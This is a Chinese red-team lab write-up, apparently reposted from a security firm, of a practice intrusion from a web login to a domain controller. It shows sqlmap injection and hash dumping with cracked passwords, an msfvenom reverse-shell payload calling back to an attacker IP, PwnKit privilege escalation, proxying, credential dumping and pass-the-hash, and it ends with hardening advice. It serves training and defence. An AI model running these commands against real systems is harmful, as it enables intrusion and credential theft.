九维团队-红队(突破)| 复盘试验一次从web到域控的过程

admin 2023年12月23日11:23:59评论24 views字数 2465阅读8分13秒阅读模式

九维团队-红队(突破)| 复盘试验一次从web到域控的过程

注:此文为靶场练习记录,非实际情境。


信息收集

九维团队-红队(突破)| 复盘试验一次从web到域控的过程
端口扫描


nmap -p- --min-rate 1000 39.104.*.* -Pn

*左右滑动查看更多

九维团队-红队(突破)| 复盘试验一次从web到域控的过程

网站信息

九维团队-红队(突破)| 复盘试验一次从web到域控的过程

漏洞利用

九维团队-红队(突破)| 复盘试验一次从web到域控的过程
sql注入


发现有登录功能 尝试sql注入:

python sqlmap.py -r 1.txt --batch --random-agent --dbs

*左右滑动查看更多

跑出:

九维团队-红队(突破)| 复盘试验一次从web到域控的过程

python sqlmap.py -r 1.txt --batch --random-agent -D `0x7e_lab` --tablespython sqlmap.py -r 1.txt --batch --random-agent -D `0x7e_lab` -T users --columns

*左右滑动查看更多

九维团队-红队(突破)| 复盘试验一次从web到域控的过程

python sqlmap.py -r 1.txt --batch --random-agent -D `0x7e_lab` -T users -C  password --dump

*左右滑动查看更多

九维团队-红队(突破)| 复盘试验一次从web到域控的过程

尝试解密密码hash。

九维团队-红队(突破)| 复盘试验一次从web到域控的过程

密码有加盐,这里需要在字典的每一行前加一个NaCl。

user

password

解密

administrator

15657792073e8a843d4f91fc403454e1

bill

13edad4932da9dbb57d9cd15b66ed104

NaCliluvhorsesandgym

michael

bd3dad50e2d578ecba87d5fa15ca5f85

NaC12applesplus2apples

john

a7eed23a7be6fe0d765197b1027453fe

有了上面爆库出来的表md5解密。得到:

bill

13edad4932da9dbb57d9cd15b66ed104

NaCliluvhorsesandgym

michael

bd3dad50e2d578ecba87d5fa15ca5f85

NaC12applesplus2apples


Bill的密码去盐后为luvhorsesandgym。

ssh登录bill/iluvhorsesandgym:

九维团队-红队(突破)| 复盘试验一次从web到域控的过程

msf生成一个反弹elf让目标机器上线:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=8.130.*.* LPORT=1234 -f elf -o zbdx.elf

*左右滑动查看更多

九维团队-红队(突破)| 复盘试验一次从web到域控的过程

上传到http://39.104..:10086/。

修改权限777。

九维团队-红队(突破)| 复盘试验一次从web到域控的过程

msf设置监听上线:

攻击机:msfconsole -quse exploit/multi/handlerset payload linux/x86/set lhost 8.130.*.*set lport 1234run------肉鸡:./zbdx.elf

九维团队-红队(突破)| 复盘试验一次从web到域控的过程

获取meterpreter之后再进行root提权。

获取meterpreter之后:

run post/multi/recon/local_exploit_suggester

*左右滑动查看更多

九维团队-红队(突破)| 复盘试验一次从web到域控的过程

use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexecshow options   进行配置run

*左右滑动查看更多

九维团队-红队(突破)| 复盘试验一次从web到域控的过程

主机存活


上传fscan进行主机存活探测。

192.168.0.100+

chomod 777 fscan_amd64  # 修改权限./fscan_amd64 -h 192.168.0/24 # 存活主机探测

*左右滑动查看更多

九维团队-红队(突破)| 复盘试验一次从web到域控的过程

可以看到内网主机有:

(icmp) Target 192.168.0.2     is alive(icmp) Target 192.168.0.128   is alive(icmp) Target 192.168.0.129   is alive(icmp) Target 192.168.0.143   is alive

*左右滑动查看更多

143是使用的这台跳板机:

九维团队-红队(突破)| 复盘试验一次从web到域控的过程

128是win7,129是0x7e的域控。

上线win7

在之前的主机文件夹中发现台账,其中记录有部分设备的登录密码,发现用户名win7。

九维团队-红队(突破)| 复盘试验一次从web到域控的过程

方法一:利用端口转发上线win7


使用ssh进行端口转发:

ssh -CfNg -L 2333:192.168.0.128:3389 bill@39.104.*.* -p10086rdesktop 127.0.0.1:2333

*左右滑动查看更多

尝试用用户名密码登入3389。

win7/QWEa*****

或使用Kali添加socks:

sudo vi /etc/proxychains4.conf

最后一行添加:

socks5 8.130.*.* 2222

九维团队-红队(突破)| 复盘试验一次从web到域控的过程

然后就能直接和win7通信:

proxychains rdesktop 192.168.0.128

九维团队-红队(突破)| 复盘试验一次从web到域控的过程

后续操作就和上面一样了。使用账号密码登录进入win7,前期使用msf生成elf反弹控制到linux主机,然后从msf转入CS对其他windows系统进行下一步横向。

win7上线cs。

九维团队-红队(突破)| 复盘试验一次从web到域控的过程

抓取明文密码:

九维团队-红队(突破)| 复盘试验一次从web到域控的过程

九维团队-红队(突破)| 复盘试验一次从web到域控的过程

然后提权:

九维团队-红队(突破)| 复盘试验一次从web到域控的过程

主机发现:

net view/port scan

九维团队-红队(突破)| 复盘试验一次从web到域控的过程

开启中继监听:

九维团队-红队(突破)| 复盘试验一次从web到域控的过程

九维团队-红队(突破)| 复盘试验一次从web到域控的过程

利用system权限的win7横向移动到win servers2012上:

九维团队-红队(突破)| 复盘试验一次从web到域控的过程

成功拿到win servers2012,然后抓取明文密码与hash。

九维团队-红队(突破)| 复盘试验一次从web到域控的过程

先用VNC交互看看,然后使用插件开启3389:

九维团队-红队(突破)| 复盘试验一次从web到域控的过程

九维团队-红队(突破)| 复盘试验一次从web到域控的过程

尝试链接rdp(失败):

九维团队-红队(突破)| 复盘试验一次从web到域控的过程

看看文件:

九维团队-红队(突破)| 复盘试验一次从web到域控的过程

九维团队-红队(突破)| 复盘试验一次从web到域控的过程


shell systeminfo  # 查看域信息

九维团队-红队(突破)| 复盘试验一次从web到域控的过程

主机存活探测。

net view失败了,那就试试portscan。

九维团队-红队(突破)| 复盘试验一次从web到域控的过程

九维团队-红队(突破)| 复盘试验一次从web到域控的过程

九维团队-红队(突破)| 复盘试验一次从web到域控的过程

显示10段的有:

10.10.10.12810.10.10.134  # 是win servers201210.10.10.254

九维团队-红队(突破)| 复盘试验一次从web到域控的过程

尝试哈希传递到128(前期抓取过明文密码以及hash):

九维团队-红队(突破)| 复盘试验一次从web到域控的过程

九维团队-红队(突破)| 复盘试验一次从web到域控的过程

九维团队-红队(突破)| 复盘试验一次从web到域控的过程

成功。

加固建议

九维团队-红队(突破)| 复盘试验一次从web到域控的过程

1. 对网站及时进行漏洞排查以及修复。

2. 避免密码复用,同时严格执行密码复杂度策略,避免弱口令,防止攻击者轻易对密码解密。

3. 对SSH、RDP等进行严格的限制。

4. 避免在服务器中存放台账等信息。

5. 部署防火墙,严格配置防火墙策略,关注规则库版本。

6. 服务器需及时进行漏洞排查以及修复,从而防止攻击者可以利用漏洞进行提权。

7. 严格划分不同用户权限。


九维团队-红队(突破)| 复盘试验一次从web到域控的过程

原文始发于微信公众号(安恒信息安全服务):九维团队-红队(突破)| 复盘试验一次从web到域控的过程

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月23日11:23:59
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   九维团队-红队(突破)| 复盘试验一次从web到域控的过程https://cn-sec.com/archives/2232440.html

发表评论

匿名网友 填写信息